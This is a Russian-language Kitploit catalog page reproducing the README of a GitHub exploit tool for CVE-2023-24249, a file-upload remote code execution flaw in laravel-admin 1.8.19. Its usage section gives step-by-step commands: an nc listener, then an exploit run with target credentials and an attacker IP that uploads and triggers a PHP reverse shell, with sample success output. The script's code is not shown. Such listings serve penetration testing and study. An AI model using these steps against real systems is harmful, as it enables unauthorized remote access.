Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-24249-Exploit — Эксплойт для CVE-2023-24249 - уязвимость, позволяющая удаленное выполнение кода через загрузку файлов и внедрение команд. | Kitploit
Инструменты/GitHubGitHub/iduzzel/cve-2023-24249-exploit
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubiduzzel/cve-2023-24249-exploit

CVE-2023-24249-Exploit

Эксплойт для CVE-2023-24249 - уязвимость, позволяющая удаленное выполнение кода через загрузку файлов и внедрение команд.

Репозиторий
91122 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-24249 Эксплойт-скрипт

Описание

Этот репозиторий содержит эксплойт-скрипт для CVE-2023-24249, критической уязвимости, обнаруженной в laravel-admin версии 1.8.19. Данная уязвимость позволяет произвольную загрузку файлов, что даёт злоумышленникам возможность выполнить произвольный код через специально созданный PHP-файл. Эксплойт демонстрирует, как злоумышленник может загрузить reverse shell в целевое приложение и выполнить его для получения удалённого доступа.

Детали уязвимости

CVE-2023-24249 — это уязвимость произвольной загрузки файлов в laravel-admin v1.8.19. Данная уязвимость позволяет злоумышленникам загружать и выполнять произвольные PHP-файлы, что может привести к удалённому выполнению кода.

  • Базовый балл: 7.2 HIGH
  • Вектор: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
  • Перечисление слабостей: CWE-434 — Неограниченная загрузка файла опасного типа

Ссылки

  • Эксплойт — сторонняя консультация
Репозиторий Laravel Admin на GitHub
  • Официальный сайт Laravel Admin
  • Эксплойт-скрипт

    Предоставленный эксплойт-скрипт автоматизирует процесс эксплуатации CVE-2023-24249. Он выполняет следующие шаги:

    1. Аутентификация: Выполняет вход в целевое приложение с использованием предоставленных учётных данных.
    2. Загрузка Reverse Shell: Загружает PHP-скрипт reverse shell через уязвимую функциональность загрузки файлов.
    3. Выполнение Reverse Shell: Отправляет GET-запрос к загруженному скрипту reverse shell для его выполнения и установления обратного соединения с машиной атакующего.

    Требования

    • Python 3
    • библиотека requests
    • библиотека beautifulsoup4

    Установите необходимые библиотеки с помощью pip:

    root@kitploit:~
    pip install requests beautifulsoup4
    

    Использование

    1. Клонируйте репозиторий:

      root@kitploit:~
      git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
      cd CVE-2023-24249-Exploit
      
    2. Запустите слушатель на вашей машине:

      root@kitploit:~
      nc -lvnp <PORT>
      
    3. Запустите эксплойт-скрипт:

      root@kitploit:~
      python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
      

      Замените <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP> и <YOUR_PORT> на соответствующие значения:

      • <TARGET_URL>: URL целевого приложения.
      • <USERNAME>: Имя пользователя для аутентификации.
      • <PASSWORD>: Пароль для аутентификации.
      • <YOUR_IP>: Ваш IP-адрес для получения соединения reverse shell.
      • <YOUR_PORT>: Порт, на котором работает ваш слушатель.

    Пример

    root@kitploit:~
    python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337
    

    Вывод скрипта

    Если эксплойт выполнен успешно, скрипт выведет:

    root@kitploit:~
    [+] Reverse shell успешно загружен! Выполняется попытка его запуска...
    [+] Reverse shell успешно выполнен! Проверьте ваш слушатель на <YOUR_IP>:<YOUR_PORT>
    

    Отказ от ответственности

    Данный скрипт предназначен только для образовательных целей. Несанкционированное использование этого скрипта против любой системы без явного разрешения является незаконным и неэтичным. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным скриптом.

    Скачать инструмент